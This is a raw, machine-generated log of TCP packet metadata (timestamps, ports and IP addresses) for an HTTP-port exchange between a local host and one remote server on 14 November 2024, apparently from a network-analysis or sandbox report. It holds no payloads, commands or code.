                                                                                                                                                                                                            Nov 14, 2024 12:20:17.997987032 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.998035908 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.998045921 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.998055935 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.998100996 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:17.998125076 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.044231892 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.044744968 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.044862032 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108231068 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108302116 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108340025 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108374119 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108407974 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108438015 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108443022 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108479977 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108494043 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108514071 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108526945 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108551025 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.108594894 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.115025043 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.115103006 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.115175962 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.115191936 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.115228891 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.115258932 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.115266085 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.115298986 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.115334034 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.161026955 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.161118031 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.161247969 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.224983931 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225002050 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225016117 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225083113 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225234985 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225258112 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225274086 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225285053 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225286961 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225297928 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225308895 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225321054 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225366116 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.225421906 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.232003927 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.232017994 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.232028961 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.232055902 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.232078075 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.232120991 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.232428074 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.232585907 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.232639074 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.278251886 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.278326035 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.278394938 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342133999 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342149973 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342161894 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342174053 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342216015 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342266083 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342278957 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342283964 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342335939 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342436075 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342751026 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342761040 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342772961 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342782974 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342806101 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.342844963 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.348932981 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.348946095 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.348957062 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.349036932 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.349080086 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.349092007 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.349101067 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.349128008 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.349174976 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.395406961 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.395454884 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.395476103 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.446232080 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.458899021 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.458914995 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.458926916 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.458960056 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459127903 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459140062 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459151983 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459172964 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459199905 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459606886 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459619045 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459629059 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459656954 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459863901 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459904909 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459930897 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459949017 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459960938 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.459985971 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.465965986 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.465979099 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.465989113 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.466010094 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.466037035 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.466093063 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.466188908 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.466226101 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.466248035 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.466368914 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.466404915 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.559458017 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.559489965 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.559541941 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576196909 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576210976 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576222897 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576235056 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576246023 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576256990 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576267958 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576267958 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576281071 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576303005 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576323986 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576878071 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576890945 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576904058 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.576930046 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.577217102 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.577228069 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.577238083 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.577251911 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.577271938 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.582954884 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.582966089 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.582976103 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.582987070 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.583005905 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.583028078 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.583144903 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.583276987 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.583286047 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.583296061 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.583323002 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.583343983 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700340986 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700365067 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700376034 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700387001 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700397968 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700408936 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700418949 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700457096 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700727940 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700738907 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700752974 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700771093 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700774908 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700787067 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700797081 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700810909 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.700834036 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.701632977 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.701647997 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.701658010 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.701669931 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.701682091 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.701714993 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.702195883 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.702207088 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.702218056 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.702229977 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.702248096 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.702270985 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817444086 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817466974 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817483902 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817495108 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817507029 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817518950 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817538977 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817682981 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817693949 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817724943 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817795038 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817806959 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817816973 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817826986 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817853928 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.817883968 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818231106 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818240881 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818249941 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818278074 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818300009 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818321943 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818334103 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818375111 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818782091 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818790913 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818799973 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.818828106 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.819072008 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.819082975 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.819092035 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.819117069 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.819144964 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.935780048 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.935832024 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.935869932 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.935889959 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.935997009 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936031103 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936053038 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936064005 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936100006 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936111927 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936135054 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936163902 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936181068 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936196089 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936239004 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936240911 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936284065 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936333895 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936397076 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936429977 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936461926 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936475992 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936496019 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936528921 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936546087 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936562061 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936608076 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936820984 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936908960 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936953068 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.936963081 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.937005043 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.937036991 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.937050104 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.937071085 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.937104940 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.937112093 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:18.977494001 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052848101 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052865982 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052877903 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052889109 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052898884 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052922964 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052937984 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052947998 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052958965 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.052988052 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053008080 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053042889 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053361893 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053409100 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053452015 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053462029 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053502083 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053534031 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053549051 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053559065 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053581953 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053694963 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053736925 CET4999580192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053774118 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053888083 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053899050 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053909063 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053920031 CET8049995147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:19.053929090 CET4999580192.168.2.10147.45.47.81
